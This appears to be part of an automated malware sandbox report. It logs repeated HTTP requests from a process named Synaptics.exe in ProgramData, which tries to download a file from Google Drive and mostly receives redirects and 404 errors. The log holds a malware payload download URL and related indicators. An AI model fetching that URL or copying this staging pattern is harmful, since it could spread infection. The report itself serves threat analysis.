                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:27 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7u95LCBikf2VrlPZgsV-yI6nxuqMn2Ojd7VJ5HUViP0ZCF2RixzeZv0yho1ewOmz7H
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-z7XQUqKBFeWkyxMcf_-bXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="P6q9uXgnH5OBFZNA1IwioA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49855 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:28 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:28 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-P1Fz65zWOE-ud9pl_6CLow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49854 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:28 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:29 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-RIe_VXwCtSriN_ZweBl1SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49857 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:28 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:29 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4aikY1hqp2JJwd_UVjRDghR_eADDFrb1kjxIdoXxulk6H0qKleGVRTUJNzv2Grlb4iH4J0CYE
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:29 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wcZe5jZLEzFE417kITNx4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:29 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:29 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="MCSg4uNuwnrrE1UhpOV_bA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:29 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49856 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:28 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6crF2b7FSSTausPhad_4aDlZpOp8Brm48BUTsUxCBmURGshwiTp9F1tflMuoY3Q8yL
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:29 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-LvSAwuG9HlrbjnO4JLmlYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="IO07GFsGrQeVT5wI1gktHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:29 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49858 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:29 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 03:59:29 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-eCG07fxGia1pc9tFJV8DHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49861 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:29 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 03:59:30 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-toqfGT81Ht16fckrYy6YxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49863 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:29 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:30 UTC | 1250 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC6EPYnsdxaBmwEzi3oy1xasAkPzCYoNSGeyMsE1cGSNvC1X7G2LjMv8A-wfiQsKaUpEsVzlc10
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 03:59:30 GMT
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-Vgj3aQ7owv7-FjrEcxeqhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 03:59:30 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:30 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="l1opnM0qZKooL_vucj5rmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:30 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49862 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:29 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:30 UTC | 1243 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC4Cu1NUzd1xt5FYFxcONGcm_PxAcuGzuznSwVVcy8m3_pue8yP4m8t1Nm8JX3NBtxs1
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 03:59:30 GMT
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-lp1vjZwqRCu2CrdcRbpMNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 03:59:30 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:30 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="GJDLKo8dHNMbQxZUa0MDJA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:30 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49864 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:30 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:30 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wTgqwlrzD9JIKxMjplswMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
